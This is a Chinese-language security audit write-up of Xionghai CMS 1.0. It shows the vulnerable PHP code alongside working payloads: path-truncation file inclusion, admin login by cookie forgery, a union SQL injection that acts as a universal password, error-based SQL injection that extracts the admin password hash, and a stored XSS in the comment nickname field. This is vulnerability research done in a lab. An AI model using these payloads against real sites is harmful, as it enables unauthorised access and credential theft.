代码审计之熊海cms1.0代码审计 – 作者:yanmie

一、熊海cms1.0代码审计

环境:

win7 虚拟机

phpstudy2018

php5.2.17+apache

xhcms_v1.0

二、首页文件包含漏洞

image-20210218095419744

index.php:

<?php
//单一入口模式
error_reporting(0); //关闭错误显示
$file=addslashes($_GET['r']); //接收文件名
$action=$file==''?'index':$file; //判断为空或者等于index
include('files/'.$action.'.php'); //载入相应文件
?>
  • addslashes() 函数返回在预定义字符之前添加反斜杠的字符串。

    预定义字符是:

单引号(’)

双引号(”)

反斜杠(\)

NULL

所以这里文件包含 00 截断肯定不行了。

?截断测试失败。

. 截断成功。

http://www.xhcms.com/?r=../1.txt........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

image-20210218095614109

/. 截断,测试长度(205)

http://www.xhcms.com/?r=../1.txt/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././

image-20210218101939441

三、后台首页文件包含漏洞

同样的道理

<?php
//单一入口模式
error_reporting(0); //关闭错误显示
$file=addslashes($_GET['r']); //接收文件名
$action=$file==''?'index':$file; //判断为空或者等于index
include('files/'.$action.'.php'); //载入相应文件
?>

四、cookie欺骗登录后台

对后台登录功能点审计。

首先从这段代码看看,为甚么访问后台动作 action 会等于login,

<?php
//单一入口模式
error_reporting(0); //关闭错误显示
$file=addslashes($_GET['r']); //接收文件名
$action=$file==''?'index':$file; //判断为空或者等于index
include('files/'.$action.'.php'); //载入相应文件
?>

为空的话,应该等于index,包含files/indx.php,

<?php
require'../inc/checklogin.php';
require'../inc/conn.php';
$indexopen='class="open"';
?>

这里包含了checklogin.php,

<?php
$user=$_COOKIE['user'];
if($user==""){
header("Location: ?r=login");
exit;
}
?>

这里判断 cookie ,由于没有 cookie ,所以跳转到login,

但是这里也很明显,可以伪造 cookie, 使其不跳转 login,

直接登录

image-20210218105925534

五、万能密码登录后台

我们再来看看正常输入账号密码的登录流程。

login.php:

<?php
ob_start();
require'../inc/conn.php';
$login=$_POST['login'];
$user=$_POST['user'];
$password=$_POST['password'];
$checkbox=$_POST['checkbox'];

if($login<>""){
$query="SELECT * FROM manage WHERE user='$user'";
$result=mysql_query($query) ordie('SQL语句有误:'.mysql_error());
$users=mysql_fetch_array($result);

if(!mysql_num_rows($result)) {  
echo"<Script language=JavaScript>alert('抱歉,用户名或者密码错误。');history.back();</Script>";
exit;
}else{
$passwords=$users['password'];
if(md5($password)<>$passwords){
echo"<Script language=JavaScript>alert('抱歉,用户名或者密码错误。');history.back();</Script>";
exit;
}
//写入登录信息并记住30天
if($checkbox==1){
setcookie('user',$user,time()+3600*24*30,'/');
}else{
setcookie('user',$user,0,'/');
}
echo"<script>this.location='?r=index'</script>";
exit;
}
exit;
ob_end_flush();
}
?>

这里查用户名,查出以后再判断其密码md5值是否相等,

那么我们即可构造万能密码,受 php.ini 配置和 mysql 字符集的影响,这里 mysql 字符集为 utf-8 ,

如果 php.ini 中magic_quotes_gpc = Off就存在注入,如果为 on 就不存在。

php5.4 magic_quotes_gpc默认关闭

我们暂且按照关闭测试。

先看看数据库有 8 个字段

image-20210218111548033

第四个是密码。

构造

账号: 1' union select 1,2,3,md5(4),5,6,7,8#
密码: 4

成功登录,

当然此处其他注入收发也可以,比如报错注入。

六、前台sql注入

image-20210218115143667

files/software.php:

<?php 
require 'inc/conn.php';
require 'inc/time.class.php';
$query = "SELECT * FROM settings";
$resul = mysql_query($query) or die('SQL语句有误:'.mysql_error());
$info = mysql_fetch_array($resul);
$id=addslashes($_GET['cid']);
$query = "SELECT * FROM download WHERE id='$id'";
$resul = mysql_query($query) or die('SQL语句有误:'.mysql_error());
$download = mysql_fetch_array($resul);

//浏览计数
$query = "UPDATE download SET hit = hit+1 WHERE id=$id";
@mysql_query($query) or die('修改错误:'.mysql_error());
?>

浏览次数这里无单引号保护,存在注入。

可进行报错注入

http://www.xhcms.com/?r=software&cid=1  or extractvalue(1,concat(0x7e,substr((select group_concat(password) from manage),1,30),0x7e))#


http://www.xhcms.com/?r=software&cid=1  or extractvalue(1,concat(0x7e,substr((select group_concat(password) from manage),31,30),0x7e))#

分别得到

修改错误:XPATH syntax error: '~21232f297a57a5a743894a0e4a801f~'

修改错误:XPATH syntax error: '~c3~'

拼接: 21232f297a57a5a743894a0e4a801fc3

得到密码

image-20210218115639796

还有file/content.php和这个是一样的。

当然还有很多登陆后台以后的sql注入,这里不一一展开了。

七、评论xss漏洞

去尝试评论功能点

image-20210218121914359

这里只显示了昵称处的 xss

image-20210218122105385

评论处的xss被过滤,去回溯代码分析为啥?

抓包很明显,对应的 文件为file/submit.php

48 行,被过滤了

$content= addslashes(strip_tags($content));//过滤HTML

来源:freebuf.com 2021-02-25 16:00:40 by: yanmie

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论